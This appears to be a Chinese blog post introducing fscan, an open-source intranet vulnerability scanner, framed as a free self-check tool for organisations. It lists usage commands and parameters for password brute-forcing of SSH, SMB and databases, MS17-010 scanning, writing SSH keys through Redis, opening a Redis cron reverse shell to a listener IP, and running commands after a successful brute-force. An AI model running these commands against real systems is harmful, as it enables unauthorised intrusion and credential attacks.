主机漏洞扫描工具有哪些(内网安全漏洞扫描工具fscan)

发表时间:2023-11-19 08:06:02
0 0

最近几年,经常会开展一些HW行动,大的单位或者有钱有经费的单位会找团队来做HW的防范服务,普通单位没钱没经费,怎么办?

这里分享一款快捷、简单的安全漏洞扫描工具fscan,普通人都能使用,简单检测一下单位内部系统的安全漏洞。免费的,开源的。就一个小文件,4M多一点。

fscan是一款用go语言编写的开源工具,一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。

按照软件官方的说法,该工具支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能

主要功能

1.信息搜集:

存活探测(icmp)端口扫描

2.爆破功能:

各类服务爆破(ssh、smb等)数据库密码爆破(mysql、mssql、redis、psql等)

3.系统信息、漏洞扫描:

netbios探测、域控识别获取目标网卡信息高危漏洞扫描(ms17010等)

4.Web探测功能:

webtitle探测web指纹识别(常见cms、oa框架等)web漏洞扫描(weblogic、st2等,支持xray的poc)

5.漏洞利用:

redis写公钥或写计划任务ssh命令执行

6.其他功能:

文件保存

有经验的可以自己编译,我们普通人就直接下载编译好的工具使用就可以,下载地址在最后。

使用比较简单,命令行下运行就可

简单用法

fscan.exe-h192.168.1.1/24(默认使用全部模块)fscan.exe-h192.168.1.1/16(B段扫描)

其他用法

fscan.exe-h192.168.1.1/24-np-no-nopoc(跳过存活检测、不保存文件、跳过webpoc扫描)fscan.exe-h192.168.1.1/24-rfid_rsa.pub(redis写公钥)fscan.exe-h192.168.1.1/24-rs192.168.1.1:6666(redis计划任务反弹shell)fscan.exe-h192.168.1.1/24-cwhoami(ssh爆破成功后,命令执行)fscan.exe-h192.168.1.1/24-mssh-p2222(指定模块ssh和端口)fscan.exe-h192.168.1.1/24-pwdfpwd.txt-userfusers.txt(加载指定文件的用户名、密码来进行爆破)fscan.exe-h192.168.1.1/24-o/tmp/1.txt(指定扫描结果保存路径,默认保存在当前路径)fscan.exe-h192.168.1.1/8(A段的192.x.x.1和192.x.x.254,方便快速查看网段信息)fscan.exe-h192.168.1.1/24-msmb-pwdpassword(smb密码碰撞)fscan.exe-h192.168.1.1/24-mms17010(指定模块)fscan.exe-hfip.txt(以文件导入)

完整参数

-cstringssh命令执行-cookiestring设置cookie-debugint多久没响应,就打印当前进度(default60)-domainstringsmb爆破模块时,设置域名-hstring目标ip:192.168.11.11|192.168.11.11-255|192.168.11.11,192.168.11.12-hfstring读取文件中的目标-hnstring扫描时,要跳过的ip:-hn192.168.1.1/24-mstring设置扫描模式:-mssh(default“all”)-no扫描结果不保存到文件中-nobr跳过sql、ftp、ssh等的密码爆破-nopoc跳过webpoc扫描-np跳过存活探测-numintwebpoc发包速率(default20)-ostring扫描结果保存到哪(default“result.txt”)-pstring设置扫描的端口:22|1-65535|22,80,3306(default“21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017”)-pastring新增需要扫描的端口,-pa3389(会在原有端口列表基础上,新增该端口)-pathstringfcgi、smbromotefilepath-ping使用ping代替icmp进行存活探测-pnstring扫描时要跳过的端口,as:-pn445-pocnamestring指定webpoc的模糊名字,-pocnameweblogic-proxystring设置代理,-proxyhttp://127.0.0.1:8080-userstring指定爆破时的用户名-userfstring指定爆破时的用户名文件-pwdstring指定爆破时的密码-pwdfstring指定爆破时的密码文件-rfstring指定redis写公钥用模块的文件(as:-rfid_rsa.pub)-rsstringredis计划任务反弹shell的ip端口(as:-rs192.168.1.1:6666)-silent静默扫描,适合cs扫描时不回显-sshkeystringssh连接时,指定ssh私钥-tint扫描线程(default600)-timeint端口扫描超时时间(default3)-ustring指定Url扫描-ufstring指定Url文件扫描-wtintweb访问超时时间(default5)

测试截图:

图片来源网络

源码链接:

https://github.com/shadow1ng/fscan

声明:本文图片、文字、视频等内容来源于互联网,本站无法甄别其准确性,建议谨慎参考,本站不对您因参考本文所带来的任何后果负责!本站尊重并保护知识产权,本文版权归原作者所有,根据《信息网络传播权保护条例》,如果我们转载内容侵犯了您的权利,请及时与我们联系,我们会做删除处理,谢谢。

全部评论 0条
请先登录发表后评论(·ω·)
表情
发表
1页,跳至

金币

主题
最新发表
返回顶部